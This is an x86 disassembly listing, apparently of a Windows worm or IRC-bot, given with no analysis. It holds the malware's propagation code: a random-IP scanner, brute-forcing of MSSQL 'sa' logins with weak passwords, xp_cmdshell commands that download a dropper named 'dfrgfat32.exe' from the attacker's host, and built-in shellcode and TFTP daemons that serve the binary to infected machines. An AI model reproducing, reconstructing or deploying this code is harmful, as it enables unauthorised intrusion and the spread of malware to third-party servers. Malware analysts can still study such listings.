call dword_401088 ; ExitThread
push ebp
mov ebp, esp
sub esp, 610h
push ebx
push esi
mov esi, [ebp+8]
push edi
push 6
push offset aR ; "/\\r\n:"
mov eax, [esi+4]
imul eax, 2Ch
push dword_402F5C[eax]
mov ax, ds:word_409ED2
push eax
lea eax, [ebp-610h]
push ds:dword_409ECC
push 200h
push eax
call sub_40785C
mov edi, eax
xor ebx, ebx
add esp, 1Ch
cmp edi, ebx
jnz short loc_406F01
push ebx
call dword_401088 ; ExitThread
loc_406F01: ; CODE XREF: code:00406EF8�j
push 10h
lea eax, [ebp-10h]
push ebx
push eax
call sub_409AB4 ; memset
add esp, 0Ch
mov word ptr [ebp-10h], 2
push 59Ah
call dword_4011B0 ; ntohs
mov [ebp-0Eh], ax
mov eax, [esi+8]
push ebx
push 2
push 2
mov [ebp-0Ch], eax
call dword_4011B4 ; socket
lea ecx, [ebp-10h]
push 10h
push ecx
push eax
mov [ebp+8], eax
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_406F52
push ebx
call dword_401088 ; ExitThread
loc_406F52: ; CODE XREF: code:00406F49�j
push 320h
lea eax, [ebp-410h]
push 90h
push eax
call sub_409AB4 ; memset
push 1
push 4
pop ebx
lea eax, [ebp-410h]
push ebx
push eax
call sub_409AB4 ; memset
push 6
lea eax, [ebp-2F0h]
push offset aH888r ; "h:888"
push eax
call sub_409ABA ; memcpy
push ebx
lea eax, [ebp-3AFh]
push offset dword_402D84
push eax
call sub_409ABA ; memcpy
push ebx
lea eax, [ebp-3ABh]
push offset aIiii ; "ii"
push eax
call sub_409ABA ; memcpy
mov esi, offset dword_402D88
push ebx
lea eax, [ebp-3A3h]
push esi
push eax
call sub_409ABA ; memcpy
add esp, 48h
lea eax, [ebp-39Fh]
push ebx
push esi
push eax
call sub_409ABA ; memcpy
push 3
lea eax, [ebp-337h]
push offset a512 ; "512"
push eax
call sub_409ABA ; memcpy
mov esi, 326h
lea eax, [ebp-610h]
sub esi, edi
push edi
push eax
lea eax, [ebp+esi-410h]
push eax
call sub_409ABA ; memcpy
add esp, 24h
add esi, edi
lea eax, [ebp-410h]
push 0
push esi
push eax
push dword ptr [ebp+8]
call dword_4011A8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_407029
push 0
call dword_401088 ; ExitThread
loc_407029: ; CODE XREF: code:0040701F�j
push dword ptr [ebp+8]
call sub_40867A
pop ecx
push 1
call dword_401088 ; ExitThread
push ebp
mov ebp, esp
sub esp, 610h
push ebx
push esi
mov esi, [ebp+8]
push edi
push 6
push offset aR ; "/\\r\n:"
mov eax, [esi+4]
imul eax, 2Ch
push dword_402F5C[eax]
mov ax, ds:word_409ED2
push eax
lea eax, [ebp-210h]
push ds:dword_409ECC
push 200h
push eax
call sub_40785C
mov ebx, eax
loc_40707C: ; DATA XREF: code:004028B0�o
; code:004028C4�o ...
xor edi, edi
add esp, 1Ch
cmp ebx, edi
jnz short loc_40708C
push edi
call dword_401088 ; ExitThread
loc_40708C: ; CODE XREF: code:00407083�j
push 10h
lea eax, [ebp-10h]
push edi
push eax
call sub_409AB4 ; memset
add esp, 0Ch
mov word ptr [ebp-10h], 2
push 59Ah
call dword_4011B0 ; ntohs
mov [ebp-0Eh], ax
mov eax, [esi+8]
push edi
push 2
push 2
mov [ebp-0Ch], eax
call dword_4011B4 ; socket
mov esi, eax
lea eax, [ebp-10h]
push 10h
push eax
push esi
call dword_4011AC ; connect
cmp eax, 0FFFFFFFFh
push edi
jnz short loc_4070DC
call dword_401088 ; ExitThread
loc_4070DC: ; CODE XREF: code:004070D4�j
lea eax, [ebp-610h]
push offset dword_402D8C
push eax
call sub_409ABA ; memcpy
lea eax, [ebp-210h]
push ebx
push eax
lea eax, [ebp-610h]
push eax
call sub_409ABA ; memcpy
add esp, 18h
add ebx, 75h
lea eax, [ebp-610h]
push edi
push ebx
push eax
push esi
call dword_4011A8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_407123
push edi
call dword_401088 ; ExitThread
loc_407123: ; CODE XREF: code:0040711A�j
push esi
call sub_40867A
pop ecx
push 1
call dword_401088 ; ExitThread
push ebp
mov ebp, esp
sub esp, 0C34h
mov al, ds:byte_409CF0
push esi
mov [ebp-1], al
push edi
lea eax, [ebp-10h]
xor edi, edi
push eax
mov esi, offset aSa ; "sa"
push edi
push 1
mov [ebp-34h], esi
mov dword ptr [ebp-30h], offset aRoot ; "root"
mov dword ptr [ebp-2Ch], offset aAdmin ; "admin"
mov dword ptr [ebp-28h], offset byte_409CF0
mov [ebp-24h], edi
call sub_409CD8
test ax, ax
jz short loc_40717F
push edi
call dword_401088 ; ExitThread
loc_40717F: ; CODE XREF: code:00407176�j
push 0FFFFFFFAh
push 3
push 0C8h
push dword ptr [ebp-10h]
call sub_409CD2
test ax, ax
jz short loc_40719C
push edi
call dword_401088 ; ExitThread
loc_40719C: ; CODE XREF: code:00407193�j
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-10h]
push 2
call sub_409CD8
test ax, ax
jz short loc_4071B6
push edi
call dword_401088 ; ExitThread
loc_4071B6: ; CODE XREF: code:004071AD�j
mov eax, esi
push ebx
test eax, eax
jz loc_40733D
mov ebx, [ebp+8]
lea ecx, [ebp-34h]
mov [ebp+8], ecx
mov esi, 400h
mov edi, offset aDfrgfat32_exe ; "dfrgfat32.exe"
loc_4071D4: ; CODE XREF: code:00407323�j
lea ecx, [ebp-1]
push ecx
push eax
push dword ptr [ebx+8]
call sub_4073A9
pop ecx
push eax
lea eax, [ebp-834h]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s;UID=sa;PW"...
push eax
call sub_409AC0 ; sprintf
add esp, 14h
lea eax, [ebp-1Eh]
push 3
push eax
lea eax, [ebp-0C34h]
push esi
push eax
lea eax, [ebp-834h]
push eax
call sub_409AA2 ; strlen
pop ecx
push eax
lea eax, [ebp-834h]
push eax
push 0
push dword ptr [ebp-0Ch]
call sub_409CCC
lea eax, [ebp-8]
push eax
push dword ptr [ebp-0Ch]
call sub_409CC6
push 6
push 1
call sub_409957
push eax
call sub_4098BE
add esp, 0Ch
push eax
push offset aS_txt ; "%s.txt"
lea eax, [ebp-1Ch]
push 0Ah
push eax
call sub_409A26 ; _snprintf
add esp, 10h
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-1Ch]
push edi
push eax
push 0Ah
push 4
call sub_409957
push eax
call sub_4098BE
add esp, 0Ch
push eax
push 0Ah
push 4
call sub_409957
push eax
call sub_4098BE
add esp, 0Ch
push eax
lea eax, [ebp-1Ch]
push eax
movzx eax, ds:word_409D50
push eax
push ds:dword_409ECC
call sub_4073A9
pop ecx
push eax
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'echo open %s "...
lea eax, [ebp-434h]
push esi
push eax
call sub_409A26 ; _snprintf
add esp, 34h
lea eax, [ebp-434h]
push 0FFFFFFFDh
push eax
push dword ptr [ebp-8]
call sub_409CC0
test ax, ax
jnz short loc_407318
push dword ptr [ebp-8]
push 3
call sub_409CBA
lea eax, [ebp-8]
push eax
push dword ptr [ebp-0Ch]
call sub_409CC6
push edi
lea eax, [ebp-1Ch]
push edi
push eax
push offset aExecMaster___0 ; "EXEC master..xp_cmdshell 'del %s &%s &c"...
lea eax, [ebp-434h]
push esi
push eax
call sub_409A26 ; _snprintf
add esp, 18h
lea eax, [ebp-434h]
push 0FFFFFFFDh
push eax
push dword ptr [ebp-8]
call sub_409CC0
test ax, ax
jz short loc_40732B
loc_407318: ; CODE XREF: code:004072CF�j
add dword ptr [ebp+8], 4
mov eax, [ebp+8]
mov eax, [eax]
test eax, eax
jnz loc_4071D4
jmp short loc_40733D
; ---------------------------------------------------------------------------
loc_40732B: ; CODE XREF: code:00407316�j
mov eax, [ebx+4]
imul eax, 2Ch
inc dword_402F58[eax]
lea eax, dword_402F58[eax]
loc_40733D: ; CODE XREF: code:004071BB�j
; code:00407329�j
lea eax, [ebp-0Ch]
push eax
push 2
call sub_409CBA
lea eax, [ebp-10h]
push eax
push 1
call sub_409CBA
lea eax, [ebp-8]
push eax
push 3
call sub_409CBA
push 0
call dword_401088 ; ExitThread
pop ebx
; =============== S U B R O U T I N E =======================================
sub_407367 proc near ; CODE XREF: code:loc_407725�p
push ds:dword_409D48
call dword_4011C8 ; ntohl
inc eax
push eax
call dword_4011CC ; ntohl
mov ds:dword_409D48, eax
retn
sub_407367 endp
; =============== S U B R O U T I N E =======================================
sub_407381 proc near ; CODE XREF: sub_404360+534�p
push esi
call sub_409AC6 ; rand
mov esi, eax
shl esi, 8
call sub_409AC6 ; rand
add esi, eax
shl esi, 8
call sub_409AC6 ; rand
add esi, eax
shl esi, 8
call sub_409AC6 ; rand
add eax, esi
pop esi
retn
sub_407381 endp
; =============== S U B R O U T I N E =======================================
sub_4073A9 proc near ; CODE XREF: sub_404360+EC�p
; sub_404360+142�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_4011D0 ; inet_ntoa
retn
sub_4073A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4073B4 proc near ; CODE XREF: sub_4092ED+17�p
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 124h
push ebx
push esi
push edi
and [ebp+var_1], 0
push 1
xor edi, edi
pop ebx
push edi
push ebx
push 2
mov [ebp+var_8], ebx
call dword_4011B4 ; socket
mov esi, eax
cmp esi, edi
jz short loc_40740A
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_20], 2
mov [ebp+var_1C], eax
call dword_4011B0 ; ntohs
mov [ebp+var_1E], ax
lea eax, [ebp+var_8]
push eax
push 8004667Eh
push esi
call dword_4011D4 ; ioctlsocket
cmp eax, 0FFFFFFFFh
jnz short loc_407411
loc_40740A: ; CODE XREF: sub_4073B4+26�j
xor al, al
jmp loc_4074A6
; ---------------------------------------------------------------------------
loc_407411: ; CODE XREF: sub_4073B4+54�j
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_4011AC ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_C], edi
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_124]
push edi
push eax
push edi
push edi
mov [ebp+var_120], esi
mov [ebp+var_124], ebx
call dword_4011C4 ; select
test eax, eax
jz short loc_40744E
mov [ebp+var_1], bl
loc_40744E: ; CODE XREF: sub_4073B4+95�j
xor ecx, ecx
cmp [ebp+var_124], edi
jbe short loc_40749C
lea eax, [ebp+var_120]
loc_40745E: ; CODE XREF: sub_4073B4+B8�j
cmp [eax], esi
jz short loc_407470
inc ecx
add eax, 4
cmp ecx, [ebp+var_124]
jb short loc_40745E
jmp short loc_40749C
; ---------------------------------------------------------------------------
loc_407470: ; CODE XREF: sub_4073B4+AC�j
mov eax, [ebp+var_124]
dec eax
cmp ecx, eax
jnb short loc_407496
lea eax, [ebp+ecx*4+var_120]
loc_407482: ; CODE XREF: sub_4073B4+E0�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_124]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_407482
loc_407496: ; CODE XREF: sub_4073B4+C5�j
dec [ebp+var_124]
loc_40749C: ; CODE XREF: sub_4073B4+A2�j
; sub_4073B4+BA�j
push esi
call dword_4011B8 ; closesocket
mov al, [ebp+var_1]
loc_4074A6: ; CODE XREF: sub_4073B4+58�j
pop edi
pop esi
pop ebx
leave
retn
sub_4073B4 endp
; ---------------------------------------------------------------------------
aAU@ db '=О@',0 ; DATA XREF: code:004075DF�o
align 2
dw 4074h
dd 24748B56h, 13E8308h, 326A0A74h, 107C15FFh, 0F1EB0040h
dd 660C76FFh, 0C708468Bh, 206h, 76FF5000h, 0FED6E804h
dd 0C483FFFFh, 1BD8F60Ch, 4C083C0h, 3D800689h, 409ED0h
dd 5EC67500h, 15FF006Ah, 401088h
; ---------------------------------------------------------------------------
loc_4074FC: ; DATA XREF: sub_404360+60F�o
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
mov esi, [ebp+8]
push edi
mov eax, offset aEnabled ; "enabled"
cmp byte ptr [esi+1Ch], 0
jnz short loc_407518
mov eax, offset aDisabled ; "disabled"
loc_407518: ; CODE XREF: code:00407511�j
push eax
push dword ptr [esi+10h]
movzx eax, word ptr [esi+4]
push dword ptr [esi+0Ch]
push dword ptr [esi+14h]
push eax
push dword ptr [esi]
call sub_4073A9
pop ecx
push eax
mov eax, dword_40397C
imul eax, 1Ch
push off_4016E0[eax]
push offset dword_4031C8
call sub_404C8D
add esp, 20h
push 3E8h
call dword_40107C ; Sleep
mov edi, offset dword_409D00
push edi
call dword_40109C ; RtlDeleteCriticalSection
push 80000400h
push edi
call dword_401098 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40758C
push offset aScanner ; "Scanner"
call sub_409783
push eax
call sub_40971A
pop ecx
pop ecx
push 0
call dword_401088 ; ExitThread
loc_40758C: ; CODE XREF: code:00407570�j
mov ds:byte_409ED0, 1
mov eax, [esi]
mov ds:dword_409D48, eax
mov eax, [esi+14h]
lea eax, [eax+eax*4]
shl eax, 2
add eax, 3
and al, 0FCh
call sub_409A60
mov [ebp-4], esp
push edi
call dword_401094 ; RtlEnterCriticalSection
xor ebx, ebx
cmp [esi+14h], ebx
jle short loc_407607
mov eax, [ebp-4]
lea edi, [eax+8]
loc_4075C4: ; CODE XREF: code:00407600�j
mov eax, [esi]
push 0
mov [edi-4], eax
and dword ptr [edi-8], 0
mov cx, [esi+4]
lea eax, [edi-8]
mov [edi], cx
mov ecx, [esi+0Ch]
push 1
push eax
push offset aAU@ ; "=О@"
mov [edi+4], ecx
call sub_40960A
add esp, 10h
mov [edi+8], eax
push ebx
call dword_40107C ; Sleep
inc ebx
add edi, 14h
cmp ebx, [esi+14h]
jl short loc_4075C4
loc_407602: ; CODE XREF: code:00407745�j
mov edi, offset dword_409D00
loc_407607: ; CODE XREF: code:004075BC�j
; code:0040761C�j
cmp ds:byte_409ED0, 0
jz loc_40774A
and dword ptr [ebp+8], 0
cmp dword ptr [esi+14h], 0
jle short loc_407607
mov edi, [ebp-4]
loc_407621: ; CODE XREF: code:0040773F�j
push 14h
call dword_40107C ; Sleep
mov eax, [edi]
xor ebx, ebx
cmp eax, ebx
jz loc_407725
cmp eax, 4
jz loc_407725
cmp eax, 1
jz loc_407733
cmp eax, 2
jz loc_407733
cmp eax, 3
jnz loc_407725
mov ecx, [esi+8]
cmp ecx, ebx
jz loc_407725
mov dl, [esi+1Ch]
test dl, dl
jnz short loc_4076A7
mov eax, ecx
imul eax, 2Ch
cmp byte_402F60[eax], dl
jz short loc_4076A3
mov [ebp-10h], ecx
mov ecx, [edi+4]
mov [ebp-0Ch], ecx
mov cx, [esi+4]
mov [ebp-14h], cx
push ebx
lea ecx, [ebp-14h]
push 1
push ecx
push off_402F54[eax]
call sub_40960A
add esp, 10h
jmp loc_407725
; ---------------------------------------------------------------------------
loc_4076A3: ; CODE XREF: code:00407676�j
test dl, dl
jz short loc_4076F8
loc_4076A7: ; CODE XREF: code:00407669�j
cmp word ptr dword_402F50, bx
mov [ebp-8], ebx
jz short loc_407725
mov ebx, offset dword_402F50
loc_4076B8: ; CODE XREF: code:004076F4�j
cmp byte ptr [ebx+10h], 0
jz short loc_4076EA
mov ax, [esi+4]
cmp [ebx], ax
jnz short loc_4076EA
mov ecx, [ebp-8]
mov [ebp-14h], ax
push 0
lea eax, [ebp-14h]
push 1
push eax
push dword ptr [ebx+4]
mov [ebp-10h], ecx
mov ecx, [edi+4]
mov [ebp-0Ch], ecx
call sub_40960A
add esp, 10h
loc_4076EA: ; CODE XREF: code:004076BC�j
; code:004076C5�j
inc dword ptr [ebp-8]
add ebx, 2Ch
cmp word ptr [ebx], 0
jnz short loc_4076B8
jmp short loc_407725
; ---------------------------------------------------------------------------
loc_4076F8: ; CODE XREF: code:004076A5�j
movzx eax, word ptr [esi+4]
push dword ptr [ebp+8]
push eax
push dword ptr [edi+4]
call sub_4073A9
pop ecx
push eax
mov eax, dword_40397C
imul eax, 1Ch
push off_4016E0[eax]
push offset dword_40317C
call sub_404C8D
add esp, 14h
loc_407725: ; CODE XREF: code:0040762F�j
; code:00407638�j ...
call sub_407367
mov [edi+4], eax
mov dword ptr [edi], 1
loc_407733: ; CODE XREF: code:00407641�j
; code:0040764A�j
inc dword ptr [ebp+8]
add edi, 14h
mov eax, [ebp+8]
cmp eax, [esi+14h]
jl loc_407621
jmp loc_407602
; ---------------------------------------------------------------------------
loc_40774A: ; CODE XREF: code:0040760E�j
push 1388h
call dword_40107C ; Sleep
and dword ptr [ebp+8], 0
cmp dword ptr [esi+14h], 0
jle short loc_40777D
mov eax, [ebp-4]
lea ebx, [eax+10h]
loc_407765: ; CODE XREF: code:0040777B�j
push 0
push dword ptr [ebx]
call dword_401090 ; TerminateThread
inc dword ptr [ebp+8]
add ebx, 14h
mov eax, [ebp+8]
cmp eax, [esi+14h]
jl short loc_407765
loc_40777D: ; CODE XREF: code:0040775D�j
push dword ptr [ebp-4]
call sub_409ACC
pop ecx
push edi
call dword_40108C ; RtlLeaveCriticalSection
push offset aScanner ; "Scanner"
call sub_409783
push eax
call sub_40971A
pop ecx
pop ecx
push 0
call dword_401088 ; ExitThread
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077A7 proc near ; CODE XREF: sub_40785C+59�p
; sub_40785C+7B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
xor edx, edx
push esi
cmp [ebp+arg_4], edx
jbe short loc_4077D6
loc_4077B2: ; CODE XREF: sub_4077A7+2D�j
xor ecx, ecx
cmp [ebp+arg_C], ecx
jbe short loc_4077D0
mov eax, [ebp+arg_0]
mov al, [edx+eax]
xor al, [ebp+arg_10]
loc_4077C2: ; CODE XREF: sub_4077A7+27�j
mov esi, [ebp+arg_8]
cmp al, [ecx+esi]
jz short loc_4077DB
inc ecx
cmp ecx, [ebp+arg_C]
jb short loc_4077C2
loc_4077D0: ; CODE XREF: sub_4077A7+10�j
inc edx
cmp edx, [ebp+arg_4]
jb short loc_4077B2
loc_4077D6: ; CODE XREF: sub_4077A7+9�j
xor al, al
loc_4077D8: ; CODE XREF: sub_4077A7+36�j
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4077DB: ; CODE XREF: sub_4077A7+21�j
mov al, 1
jmp short loc_4077D8
sub_4077A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4077DF proc near ; CODE XREF: sub_40785C+3B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push edi
mov edi, 153h
cmp [ebp+arg_4], edi
jnb short loc_4077F1
xor eax, eax
jmp short loc_407859
; ---------------------------------------------------------------------------
loc_4077F1: ; CODE XREF: sub_4077DF+C�j
push esi
mov esi, [ebp+arg_0]
push edi
push offset dword_40327C
push esi
call sub_409ABA ; memcpy
mov eax, [ebp+arg_8]
add esp, 0Ch
mov [esi+0D3h], eax
push [ebp+arg_C]
call dword_4011B0 ; ntohs
mov [esi+0DAh], ax
mov eax, [ebp+arg_10]
push 7Ah
push 61h
mov [esi+0F6h], eax
call sub_409957
push 7Ah
push 61h
mov [esi+111h], al
call sub_409957
push 7Ah
push 61h
mov [esi+112h], al
call sub_409957
add esp, 18h
mov [esi+113h], al
mov eax, edi
pop esi
loc_407859: ; CODE XREF: sub_4077DF+10�j
pop edi
pop ebp
retn
sub_4077DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40785C proc near ; CODE XREF: code:004053F2�p
; code:004056BD�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 16Fh
jnb short loc_40786E
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40786E: ; CODE XREF: sub_40785C+C�j
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push 1Ch
push offset dword_40325C
lea ebx, [edi+1Ch]
push edi
mov [ebp+var_4], ebx
call sub_409ABA ; memcpy
push [ebp+arg_10]
mov esi, 153h
push [ebp+arg_C]
push [ebp+arg_8]
push esi
push ebx
call sub_4077DF
mov eax, dword_403258
add esp, 20h
mov [ebp+arg_4], eax
loc_4078A7: ; CODE XREF: sub_40785C+94�j
push 0
lea eax, [ebp+arg_4]
push [ebp+arg_18]
push [ebp+arg_14]
push 4
push eax
call sub_4077A7
add esp, 14h
test al, al
jnz short loc_4078E3
mov eax, [ebp+arg_4]
push 0
push [ebp+arg_18]
xor eax, esi
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push [ebp+arg_14]
push 4
push eax
call sub_4077A7
add esp, 14h
test al, al
jz short loc_4078F2
loc_4078E3: ; CODE XREF: sub_40785C+63�j
call sub_409995
mov [ebp+arg_4], eax
mov dword_403258, eax
jmp short loc_4078A7
; ---------------------------------------------------------------------------
loc_4078F2: ; CODE XREF: sub_40785C+85�j
mov eax, [ebp+arg_4]
mov [edi+3], eax
mov eax, [ebp+var_8]
mov [edi+9], eax
mov bl, byte_403254
mov byte ptr [ebp+arg_0], bl
loc_407907: ; CODE XREF: sub_40785C+D4�j
push [ebp+arg_0]
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+var_4]
call sub_4077A7
add esp, 14h
test al, al
jz short loc_407932
call sub_4099A9
mov bl, al
mov byte ptr [ebp+arg_0], bl
mov byte_403254, bl
jmp short loc_407907
; ---------------------------------------------------------------------------
loc_407932: ; CODE XREF: sub_40785C+C2�j
mov [edi+12h], bl
xor eax, eax
loc_407937: ; CODE XREF: sub_40785C+E5�j
mov ecx, [ebp+var_4]
add ecx, eax
xor [ecx], bl
inc eax
cmp eax, esi
jb short loc_407937
pop edi
pop esi
mov eax, 16Fh
pop ebx
leave
retn
sub_40785C endp
; ---------------------------------------------------------------------------
loc_40794D: ; DATA XREF: code:00407B74�o
push ebp
mov ebp, esp
sub esp, 390h
push ebx
xor ebx, ebx
push edi
mov edi, [ebp+8]
push ebx
lea eax, [ebp-0Ch]
push 4
push eax
push edi
call dword_4011A4 ; recv
cmp eax, 4
jz short loc_407977
push ebx
call dword_401088 ; ExitThread
loc_407977: ; CODE XREF: code:0040796E�j
cmp word ptr dword_402F50, bx
mov [ebp-4], ebx
jz short loc_40799B
mov eax, offset dword_402F50
loc_407988: ; CODE XREF: code:00407999�j
mov ecx, [eax+0Ch]
cmp ecx, [ebp-0Ch]
jz short loc_4079A9
inc dword ptr [ebp-4]
add eax, 2Ch
cmp [eax], bx
jnz short loc_407988
loc_40799B: ; CODE XREF: code:00407981�j
push edi
call sub_40867A
pop ecx
push ebx
call dword_401088 ; ExitThread
loc_4079A9: ; CODE XREF: code:0040798E�j
lea eax, [ebp-8Ch]
push eax
push edi
call sub_4085AE
pop ecx
test al, al
pop ecx
jnz short loc_4079CF
lea eax, [ebp-8Ch]
push offset aUnknown ; "unknown"
push eax
call sub_409AAE ; strcpy
pop ecx
pop ecx
loc_4079CF: ; CODE XREF: code:004079BA�j
lea eax, [ebp-190h]
push 104h
push eax
push ebx
call dword_4010A0 ; GetModuleFileNameA
test eax, eax
jnz short loc_4079ED
push ebx
call dword_401088 ; ExitThread
loc_4079ED: ; CODE XREF: code:004079E4�j
lea eax, [ebp-190h]
push offset dword_40341C
push eax
call sub_409ADE ; fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp-8], eax
jnz short loc_407A0E
push ebx
call dword_401088 ; ExitThread
loc_407A0E: ; CODE XREF: code:00407A05�j
push esi
mov esi, 200h
push eax
push esi
lea eax, [ebp-390h]
push 1
push eax
call sub_409AD8 ; fread
add esp, 10h
push ebx
push eax
lea eax, [ebp-390h]
push eax
push edi
mov edi, dword_4011A8
loc_407A37: ; CODE XREF: code:00407A63�j
call edi ; dword_4011A8
cmp eax, ebx
jz short loc_407A65
cmp eax, 0FFFFFFFFh
jz short loc_407A65
push dword ptr [ebp-8]
lea eax, [ebp-390h]
push esi
push 1
push eax
call sub_409AD8 ; fread
add esp, 10h
push ebx
push eax
lea eax, [ebp-390h]
push eax
push dword ptr [ebp+8]
jmp short loc_407A37
; ---------------------------------------------------------------------------
loc_407A65: ; CODE XREF: code:00407A3B�j
; code:00407A40�j
mov esi, [ebp-4]
lea eax, [ebp-8Ch]
imul esi, 2Ch
inc dword_402F58[esi]
push eax
lea edi, dword_402F58[esi]
lea eax, [ebp-8Ch]
push eax
call sub_4091CA
pop ecx
push eax
mov eax, dword_40397C
push dword ptr [edi]
imul eax, 1Ch
push off_402F4C[esi]
push off_4016E0[eax]
push offset dword_4033D0
call sub_404C8D
push dword ptr [ebp+8]
call sub_40867A
push dword ptr [ebp-8]
call sub_409AD2 ; fclose
add esp, 20h
push ebx
call dword_401088 ; ExitThread
pop esi
loc_407AC7: ; DATA XREF: sub_409022+EB�o
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push 6
push 1
push 2
call dword_4011B4 ; socket
mov esi, offset aShellcodedaemo ; "ShellcodeDaemon"
mov edi, eax
push esi
call sub_409783
lea eax, [eax+eax*2]
xor ebx, ebx
pop ecx
cmp edi, ebx
mov ds:dword_409D68[eax*8], edi
push ebx
jnz short loc_407B01
call dword_401088 ; ExitThread
loc_407B01: ; CODE XREF: code:00407AF9�j
mov eax, [ebp+8]
movzx eax, word ptr [eax]
push eax
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
push ds:dword_409D68[eax*8]
call sub_40860A
add esp, 0Ch
test al, al
jnz short loc_407B2C
push ebx
call dword_401088 ; ExitThread
loc_407B2C: ; CODE XREF: code:00407B23�j
; code:00407BA3�j ...
lea eax, [ebp-10h]
push ebx
push eax
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
push ds:dword_409D68[eax*8]
call dword_4011D8 ; accept
push esi
mov edi, eax
call sub_409783
lea eax, [eax+eax*2]
cmp edi, 0FFFFFFFFh
pop ecx
mov ds:dword_409D6C[eax*8], edi
jz short loc_407B81
push ebx
push 1
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
push ds:dword_409D6C[eax*8]
push offset loc_40794D
call sub_40960A
add esp, 10h
loc_407B81: ; CODE XREF: code:00407B5E�j
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
push esi
cmp ds:dword_409D68[eax*8], 0FFFFFFFFh
jnz short loc_407BA5
call sub_409783
push eax
call sub_40971A
pop ecx
pop ecx
jmp short loc_407B2C
; ---------------------------------------------------------------------------
loc_407BA5: ; CODE XREF: code:00407B94�j
call sub_409783
lea eax, [eax+eax*2]
pop ecx
cmp ds:dword_409D68[eax*8], ebx
jnz loc_407B2C
push esi
call sub_409783
push eax
call sub_40971A
pop ecx
pop ecx
push ebx
call dword_401088 ; ExitThread
loc_407BD0: ; DATA XREF: sub_409022+FD�o
push ebp
mov ebp, esp
sub esp, 544h
push ebx
push esi
xor ebx, ebx
push edi
push ebx
push 2
push 2
call dword_4011B4 ; socket
mov esi, offset aTftpdaemon ; "TFTPDaemon"
mov edi, eax
push esi
call sub_409783
lea eax, [eax+eax*2]
cmp edi, ebx
pop ecx
mov ds:dword_409D68[eax*8], edi
jnz short loc_407C0C
push ebx
call dword_401088 ; ExitThread
loc_407C0C: ; CODE XREF: code:00407C03�j
push 1
push 45h
push esi
call sub_409783
lea eax, [eax+eax*2]
pop ecx
push ds:dword_409D68[eax*8]
call sub_40860A
add esp, 0Ch
test al, al
jnz short loc_407C34
push ebx
call dword_401088 ; ExitThread
loc_407C34: ; CODE XREF: code:00407C2B�j
lea eax, [ebp-544h]
push 104h
push eax
push ebx
call dword_4010A0 ; GetModuleFileNameA
test eax, eax
jnz short loc_407C52
push ebx
call dword_401088 ; ExitThread
loc_407C52: ; CODE XREF: code:00407C49�j
lea eax, [ebp-544h]
push offset dword_40341C
push eax
call sub_409ADE ; fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp-8], eax
jnz short loc_407C73
push ebx
call dword_401088 ; ExitThread
loc_407C73: ; CODE XREF: code:00407C6A�j
mov edi, 200h
loc_407C78: ; CODE XREF: code:00407CD5�j
; code:00407DAC�j ...
push esi
mov dword ptr [ebp-14h], 5
mov dword ptr [ebp-10h], 1388h
mov [ebp-440h], ebx
call sub_409783
lea eax, [eax+eax*2]
inc dword ptr [ebp-440h]
mov dword ptr [esp], 104h
push ebx
mov eax, ds:dword_409D68[eax*8]
mov [ebp-43Ch], eax
lea eax, [ebp-33Ch]
push eax
call sub_409AB4 ; memset
add esp, 0Ch
lea eax, [ebp-14h]
push eax
push ebx
lea eax, [ebp-440h]
push ebx
push eax
push ebx
call dword_4011C4 ; select
test eax, eax
jle short loc_407C78
lea eax, [ebp-4]
mov dword ptr [ebp-4], 10h
push eax
lea eax, [ebp-24h]
push eax
push ebx
lea eax, [ebp-33Ch]
push 104h
push eax
push esi
call sub_409783
